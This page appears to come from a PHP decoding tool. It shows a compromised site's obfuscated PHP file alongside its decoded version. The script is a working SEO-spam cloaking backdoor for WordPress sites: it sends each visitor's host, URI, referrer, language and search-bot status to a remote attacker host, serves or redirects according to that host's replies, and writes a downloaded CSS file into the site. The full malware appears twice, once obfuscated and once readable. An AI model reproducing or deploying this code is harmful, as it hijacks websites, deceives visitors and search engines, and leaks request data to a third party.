Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto oHLCF; Zk1HJ: if (isset($_SERVER["\110\124\124\x50\137\122\x45\x46\105\122\10..
Decoded Output download
<?php
goto oHLCF; Zk1HJ: if (isset($_SERVER["HTTP_REFERER"])) { $h8 = $_SERVER["HTTP_REFERER"]; $h8 = $h8; } goto uprfX; ikOMI: if ($q3 == "/" || strstr($q3, "ewttm")) { fcss($y11, $l14, $o15); } goto dlhVJ; fVY0d: $s7 = $s7; goto ibyIF; ibyIF: $h8 = ''; goto Zk1HJ; TeaZQ: $l14 = $y9 . "/" . $s10 . "/" . $x13; goto EPyov; mOdyn: if (is_dir($y9 . "/wp-includes")) { $s10 = "wp-includes/css"; } else { $s10 = "css"; } goto b26dj; pHvq6: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto xZeU6; oHLCF: $h0 = "%75%77%6F%76%67%65%6E%65%6C%6D%74%2E%63%66%6E%79%62%72%6D%68%2E%6B%6C%6D"; goto neqA4; gWHdh: if (is_https()) { $b2 = "https"; } else { $b2 = "http"; } goto jFvhc; xZeU6: $d6 = $_SERVER["HTTP_HOST"]; goto SIVfn; WQofW: if (is_file($l14)) { $f29 = $j1 . "://" . $i5 . "/indexnew.php?css=1"; } else { $f29 = $j1 . "://" . $i5 . "/indexnew.php"; } goto ltkfu; FetnQ: if (substr($d6, 0, 4) == "www.") { $b12 = substr($d6, 4); } else { $b12 = $d6; } goto AyLgg; yDkUt: if ($q3 == '') { $q3 = "/"; } goto EAK1K; KE_Jo: if (!strstr($d30, "nobotuseragent")) { if (strstr($d30, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); if (file_exists($l14)) { $g31 = file_get_contents($l14); $d30 = str_replace("[##linkcss##]", $g31, $d30); } else { $d30 = str_replace("[##linkcss##]", '', $d30); } $d30 = str_replace("okhtmlgetcontent", '', $d30); echo $d30; die; } else { if (strstr($d30, "okxmlgetcontent")) { $d30 = str_replace("okxmlgetcontent", '', $d30); @header("Content-type: text/xml"); echo $d30; die; } else { if (strstr($d30, "pingxmlgetcontent")) { $d30 = str_replace("pingxmlgetcontent", '', $d30); fcss($y11, $l14, $o15); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($d30); die; } else { if (strstr($d30, "getcontent500page")) { @header("HTTP/1.1 500 Internal Server Error"); die; } else { if (strstr($d30, "getcontent404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($d30, "getcontent301page")) { @header("HTTP/1.1 301 Moved Permanently"); $d30 = str_replace("getcontent301page", '', $d30); header("Location: " . $d30); die; } } } } } } } goto TeegB; uprfX: if (isset($_SERVER["DOCUMENT_ROOT"])) { $y9 = $_SERVER["DOCUMENT_ROOT"]; } else { $y9 = dirname(__FILE__); } goto mOdyn; VlI_F: function doutdo($e16) { $i23 = ''; if (!$i23) { $i23 = @file_get_contents($e16); } return $i23; } goto vyLBV; dlhVJ: $u28 = array("web" => $d6, "zz" => disbot(), "uri" => $j4, "urlshang" => $h8, "http" => $b2, "lang" => $s7); goto WQofW; EAK1K: $j4 = $q3; goto msoou; AyLgg: $x13 = str_rot13(substr($b12, 0, 3) . substr($i5, 0, 3)) . ".css"; goto TeaZQ; vyLBV: function doutdo_post($c24, $e25) { $h26 = curl_init(); curl_setopt($h26, CURLOPT_URL, $c24); curl_setopt($h26, CURLOPT_POST, 1); curl_setopt($h26, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($h26, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h26, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h26, CURLOPT_HEADER, 0); curl_setopt($h26, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h26, CURLOPT_POSTFIELDS, $e25); $a27 = curl_exec($h26); curl_close($h26); return $a27; } goto EwF7x; EPyov: $o15 = $j1 . "://" . $i5 . "/temp/style.css"; goto h9mJG; TE7p0: $i5 = "hjbitraryzg.psaloezu.xyz"; goto pHvq6; EwF7x: function fcss($y11, $l14, $o15) { if (is_dir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } else { if (@mkdir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } } } goto ikOMI; b26dj: $y11 = $y9 . "/" . $s10; goto FetnQ; E0A_c: function disbot() { $y22 = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($y22, "googlebot") || stristr($y22, "bing") || stristr($y22, "yahoo") || stristr($y22, "google") || stristr($y22, "Googlebot") || stristr($y22, "googlebot")) { return true; } else { return false; } } goto VlI_F; h9mJG: function ping_sitemap($e16) { $x17 = explode("\xd\xa", trim($e16)); $j18 = ''; foreach ($x17 as $g19) { $w20 = doutdo($g19); $t21 = strpos($w20, "Sitemap Notification Received") !== false ? "pingok" : "error"; $j18 .= $g19 . "-- " . $t21 . "<br>"; } return $j18; } goto E0A_c; jFvhc: $q3 = drequest_uri(); goto yDkUt; ltkfu: $d30 = trim(doutdo_post($f29, $u28)); goto KE_Jo; msoou: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $j4 = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $j4; } goto TE7p0; neqA4: $j1 = "http"; goto gWHdh; SIVfn: $s7 = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto fVY0d; TeegB: ?>
Did this file decode correctly?
Original Code
<?php
goto oHLCF; Zk1HJ: if (isset($_SERVER["\110\124\124\x50\137\122\x45\x46\105\122\105\x52"])) { $h8 = $_SERVER["\110\124\x54\120\137\122\x45\106\105\x52\105\122"]; $h8 = $h8; } goto uprfX; ikOMI: if ($q3 == "\57" || strstr($q3, "\x65\x77\164\x74\x6d")) { fcss($y11, $l14, $o15); } goto dlhVJ; fVY0d: $s7 = $s7; goto ibyIF; ibyIF: $h8 = ''; goto Zk1HJ; TeaZQ: $l14 = $y9 . "\57" . $s10 . "\x2f" . $x13; goto EPyov; mOdyn: if (is_dir($y9 . "\x2f\x77\x70\55\x69\156\143\x6c\165\x64\145\163")) { $s10 = "\x77\x70\x2d\x69\x6e\143\154\165\144\x65\x73\57\143\163\163"; } else { $s10 = "\x63\163\x73"; } goto b26dj; pHvq6: function is_https() { if (isset($_SERVER["\110\x54\x54\120\123"]) && strtolower($_SERVER["\x48\x54\x54\120\123"]) !== "\157\x66\146") { return true; } elseif (isset($_SERVER["\110\124\x54\120\137\130\137\x46\117\x52\127\101\x52\104\x45\x44\x5f\x50\122\117\x54\117"]) && $_SERVER["\x48\x54\124\x50\x5f\130\x5f\106\117\x52\127\101\122\104\105\104\137\x50\122\x4f\124\117"] === "\x68\x74\x74\160\x73") { return true; } elseif (isset($_SERVER["\110\x54\124\x50\x5f\x46\x52\117\116\x54\x5f\x45\116\x44\x5f\110\x54\124\x50\x53"]) && strtolower($_SERVER["\110\x54\124\x50\137\x46\x52\117\x4e\124\137\105\x4e\x44\x5f\x48\x54\124\x50\123"]) !== "\x6f\x66\x66") { return true; } return false; } goto xZeU6; oHLCF: $h0 = "\x25\x37\65\x25\x37\x37\45\x36\x46\45\x37\66\45\66\67\45\x36\65\45\66\105\x25\66\x35\x25\66\x43\45\x36\104\45\x37\64\45\62\x45\x25\66\x33\x25\66\66\45\x36\x45\45\x37\71\x25\66\62\x25\67\62\x25\x36\104\45\66\x38\45\62\x45\x25\x36\x42\x25\x36\103\x25\x36\104"; goto neqA4; gWHdh: if (is_https()) { $b2 = "\x68\x74\x74\160\163"; } else { $b2 = "\x68\164\164\x70"; } goto jFvhc; xZeU6: $d6 = $_SERVER["\110\124\x54\120\x5f\x48\x4f\x53\124"]; goto SIVfn; WQofW: if (is_file($l14)) { $f29 = $j1 . "\72\57\57" . $i5 . "\x2f\151\156\x64\145\170\156\145\x77\56\160\150\x70\x3f\x63\x73\x73\x3d\x31"; } else { $f29 = $j1 . "\x3a\57\57" . $i5 . "\x2f\x69\x6e\144\x65\x78\156\145\x77\x2e\x70\150\160"; } goto ltkfu; FetnQ: if (substr($d6, 0, 4) == "\167\x77\167\56") { $b12 = substr($d6, 4); } else { $b12 = $d6; } goto AyLgg; yDkUt: if ($q3 == '') { $q3 = "\x2f"; } goto EAK1K; KE_Jo: if (!strstr($d30, "\156\157\x62\x6f\x74\165\x73\145\162\141\147\x65\x6e\164")) { if (strstr($d30, "\157\153\150\x74\x6d\x6c\x67\145\164\143\x6f\x6e\x74\x65\156\x74")) { @header("\x43\157\156\164\145\x6e\164\x2d\164\171\160\x65\72\40\x74\145\x78\x74\x2f\x68\164\x6d\154\x3b\x20\x63\x68\141\x72\x73\145\164\75\x75\164\x66\x2d\70"); if (file_exists($l14)) { $g31 = file_get_contents($l14); $d30 = str_replace("\x5b\43\43\154\151\x6e\x6b\143\x73\163\43\x23\x5d", $g31, $d30); } else { $d30 = str_replace("\133\43\43\x6c\151\x6e\x6b\x63\163\x73\x23\x23\x5d", '', $d30); } $d30 = str_replace("\157\153\150\x74\x6d\154\147\145\164\x63\x6f\x6e\x74\145\x6e\x74", '', $d30); echo $d30; die; } else { if (strstr($d30, "\x6f\153\x78\x6d\x6c\147\145\164\143\x6f\156\x74\145\156\164")) { $d30 = str_replace("\x6f\x6b\170\x6d\154\x67\145\x74\x63\157\156\x74\x65\x6e\x74", '', $d30); @header("\103\x6f\x6e\164\x65\x6e\x74\x2d\x74\171\160\145\72\x20\x74\145\x78\164\x2f\170\x6d\154"); echo $d30; die; } else { if (strstr($d30, "\160\151\156\147\x78\155\154\x67\x65\x74\x63\x6f\x6e\164\145\156\x74")) { $d30 = str_replace("\x70\151\156\147\170\x6d\x6c\x67\x65\164\143\x6f\x6e\164\145\156\164", '', $d30); fcss($y11, $l14, $o15); @header("\x43\x6f\156\164\x65\x6e\164\55\x74\x79\x70\x65\72\40\164\x65\170\164\x2f\x68\x74\155\154\73\40\143\x68\141\162\163\x65\164\75\x75\164\146\x2d\70"); echo ping_sitemap($d30); die; } else { if (strstr($d30, "\x67\x65\164\143\157\156\x74\145\156\x74\65\60\x30\x70\x61\x67\145")) { @header("\x48\x54\x54\x50\x2f\x31\x2e\x31\40\65\60\x30\x20\x49\x6e\164\145\x72\x6e\141\154\40\123\x65\x72\166\145\162\x20\105\162\162\157\162"); die; } else { if (strstr($d30, "\x67\x65\x74\143\157\156\164\x65\x6e\x74\x34\x30\64\160\141\147\x65")) { @header("\x48\x54\x54\x50\x2f\61\x2e\61\x20\64\60\x34\x20\116\x6f\x74\40\x46\157\x75\156\144"); die; } else { if (strstr($d30, "\147\x65\164\143\157\x6e\x74\145\x6e\x74\x33\x30\x31\160\x61\147\x65")) { @header("\110\124\124\120\x2f\61\x2e\61\x20\x33\x30\61\x20\115\x6f\166\x65\x64\x20\x50\x65\x72\155\x61\x6e\145\x6e\x74\154\x79"); $d30 = str_replace("\x67\145\x74\x63\x6f\x6e\x74\x65\x6e\164\x33\x30\x31\x70\x61\147\145", '', $d30); header("\x4c\x6f\x63\x61\164\x69\157\x6e\x3a\40" . $d30); die; } } } } } } } goto TeegB; uprfX: if (isset($_SERVER["\x44\x4f\103\x55\x4d\x45\116\x54\x5f\x52\x4f\x4f\124"])) { $y9 = $_SERVER["\x44\x4f\x43\125\x4d\105\116\x54\x5f\122\117\x4f\x54"]; } else { $y9 = dirname(__FILE__); } goto mOdyn; VlI_F: function doutdo($e16) { $i23 = ''; if (!$i23) { $i23 = @file_get_contents($e16); } return $i23; } goto vyLBV; dlhVJ: $u28 = array("\167\x65\x62" => $d6, "\x7a\172" => disbot(), "\x75\x72\x69" => $j4, "\x75\x72\x6c\163\150\141\x6e\x67" => $h8, "\x68\x74\x74\160" => $b2, "\x6c\x61\x6e\x67" => $s7); goto WQofW; EAK1K: $j4 = $q3; goto msoou; AyLgg: $x13 = str_rot13(substr($b12, 0, 3) . substr($i5, 0, 3)) . "\56\x63\163\x73"; goto TeaZQ; vyLBV: function doutdo_post($c24, $e25) { $h26 = curl_init(); curl_setopt($h26, CURLOPT_URL, $c24); curl_setopt($h26, CURLOPT_POST, 1); curl_setopt($h26, CURLOPT_USERAGENT, "\x4d\x6f\x7a\151\x6c\154\141\57\64\x2e\x30\40\50\143\x6f\x6d\160\x61\x74\x69\x62\154\145\x3b\40\115\123\111\105\x20\x35\x2e\x30\x31\73\40\127\x69\x6e\x64\x6f\167\163\40\116\x54\40\x35\56\x30\x29"); curl_setopt($h26, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h26, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h26, CURLOPT_HEADER, 0); curl_setopt($h26, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h26, CURLOPT_POSTFIELDS, $e25); $a27 = curl_exec($h26); curl_close($h26); return $a27; } goto EwF7x; EPyov: $o15 = $j1 . "\x3a\57\57" . $i5 . "\x2f\x74\x65\x6d\160\x2f\163\164\x79\154\x65\56\x63\x73\163"; goto h9mJG; TE7p0: $i5 = "\x68\152\x62\x69\x74\x72\x61\162\x79\x7a\x67\x2e\x70\x73\141\x6c\157\145\x7a\165\x2e\x78\171\172"; goto pHvq6; EwF7x: function fcss($y11, $l14, $o15) { if (is_dir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } else { if (@mkdir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } } } goto ikOMI; b26dj: $y11 = $y9 . "\57" . $s10; goto FetnQ; E0A_c: function disbot() { $y22 = strtolower($_SERVER["\x48\124\x54\x50\x5f\x55\x53\x45\122\137\x41\107\x45\116\124"]); if (stristr($y22, "\147\157\157\x67\154\x65\142\x6f\164") || stristr($y22, "\x62\x69\x6e\147") || stristr($y22, "\x79\141\150\x6f\x6f") || stristr($y22, "\x67\x6f\157\147\x6c\x65") || stristr($y22, "\x47\157\x6f\x67\154\145\142\x6f\x74") || stristr($y22, "\x67\x6f\157\147\x6c\x65\x62\x6f\x74")) { return true; } else { return false; } } goto VlI_F; h9mJG: function ping_sitemap($e16) { $x17 = explode("\xd\xa", trim($e16)); $j18 = ''; foreach ($x17 as $g19) { $w20 = doutdo($g19); $t21 = strpos($w20, "\123\x69\164\x65\x6d\141\x70\40\116\x6f\164\151\x66\x69\x63\141\x74\151\157\x6e\40\122\x65\x63\x65\151\166\x65\144") !== false ? "\x70\x69\156\x67\x6f\153" : "\x65\162\x72\x6f\x72"; $j18 .= $g19 . "\55\x2d\40" . $t21 . "\x3c\x62\162\x3e"; } return $j18; } goto E0A_c; jFvhc: $q3 = drequest_uri(); goto yDkUt; ltkfu: $d30 = trim(doutdo_post($f29, $u28)); goto KE_Jo; msoou: function drequest_uri() { if (isset($_SERVER["\x52\x45\121\x55\105\123\x54\x5f\x55\x52\x49"])) { $j4 = $_SERVER["\x52\x45\x51\125\105\123\x54\x5f\125\x52\x49"]; } else { if (isset($_SERVER["\x61\x72\x67\166"])) { $j4 = $_SERVER["\x50\x48\x50\137\x53\105\114\106"] . "\77" . $_SERVER["\141\x72\x67\x76"][0]; } else { $j4 = $_SERVER["\x50\110\120\137\123\105\114\x46"] . "\77" . $_SERVER["\x51\x55\105\x52\131\x5f\123\x54\122\111\116\107"]; } } return $j4; } goto TE7p0; neqA4: $j1 = "\x68\x74\x74\160"; goto gWHdh; SIVfn: $s7 = @$_SERVER["\x48\x54\124\x50\x5f\x41\x43\x43\105\x50\124\x5f\x4c\101\116\107\x55\x41\107\105"]; goto fVY0d; TeegB: ?>
Function Calls
None |
Stats
MD5 | 0f4e604fb955595cb3e0a5496bf4ee89 |
Eval Count | 0 |
Decode Time | 55 ms |